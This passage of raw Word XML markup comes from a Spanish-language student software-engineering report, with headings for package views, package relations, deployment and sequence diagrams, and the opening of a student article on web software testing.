      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BACF871" wp14:editId="55C3B9ED">
            <wp:extent cx="5141595" cy="1965325"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1" name="Imagen 1" descr="C:\Users\David Soliz\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Modulo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 Soliz\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Modulo Report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1595" cy="1965325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135C75C" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772DE591" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CCE104" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE11B4F" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E1A322" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753C0586" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AACCC09" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721C2D8A" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0BF0C8" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2106FD" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. Vista de Paquetes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D160C0C" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vista Modulo Operaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9172F" w14:textId="533DE05D" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5142E4C9" wp14:editId="7850EA6A">
            <wp:extent cx="5608320" cy="40614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8320" cy="4061460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FB874" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3F91EC" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BEBB81" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEA11AE" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4956B1AF" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E4AAF0" w14:textId="36DE9B9E" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1504D544" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005B0C11" w14:textId="1DEB533A" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vista de Modulo Reportes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA9F2D" w14:textId="3706D733" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E4FC6DE" wp14:editId="36BE210E">
            <wp:extent cx="5585460" cy="30175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460" cy="3017520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E95843" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5222">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.3. Relación de Paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBC087" w14:textId="70433A65" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="258CEFF1" wp14:editId="2AFABD77">
            <wp:extent cx="5615940" cy="20193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940" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E16D9B" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F061DB" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3717FB19" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEAD16E" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FDBF1E" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659BD524" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B2C3B6" w14:textId="3200095F" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Diseño</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965C156" w14:textId="387B7135" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.1. Diseño de Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB6DDAD" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diagrama de despliegue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05632319" w14:textId="68C7D7E5" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:left="-1134"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADDBA5B" wp14:editId="2537CD33">
            <wp:extent cx="5943600" cy="39344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34460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E77420" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8830BF" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234F09AF" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C894691" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCEDC4D" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7461564C" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7537C1D3" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC42AC0" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4746231D" w14:textId="7713C046" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2. Diseño de Lógica de Negocios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDEFBE" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diagrama de Secuencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A32E8E" w14:textId="4C1AB0BC" w:rsidR="00254721" w:rsidRPr="00D6737B" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:left="-851"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17430BAE" wp14:editId="6C852CF5">
            <wp:extent cx="5943600" cy="6080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080125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A33D4F" w14:textId="3FA8E230" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFA2E7E" w14:textId="34D6768F" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228F1D2C" w14:textId="675EF6ED" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4133C90D" w14:textId="7AB4C139" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0365AF2E" w14:textId="35E6DBA8" w:rsidR="00254721" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc196776213"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ARTICULOS PERSONALES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="74857BB8" w14:textId="3FE82AD2" w:rsidR="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD1A7FE" w14:textId="77777777" w:rsidR="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00737B42" w:rsidSect="00DD0CA3">
          <w:footerReference w:type="default" r:id="rId56"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDA7AB7" w14:textId="0927F43E" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Rol Fundamental de las Pruebas en el Desarrollo de Software Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2A13C" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Autor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> Cárdenas Carrasco Michel Albert</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Estudiante de Ingeniería de Sistemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45106412" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBE83F" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
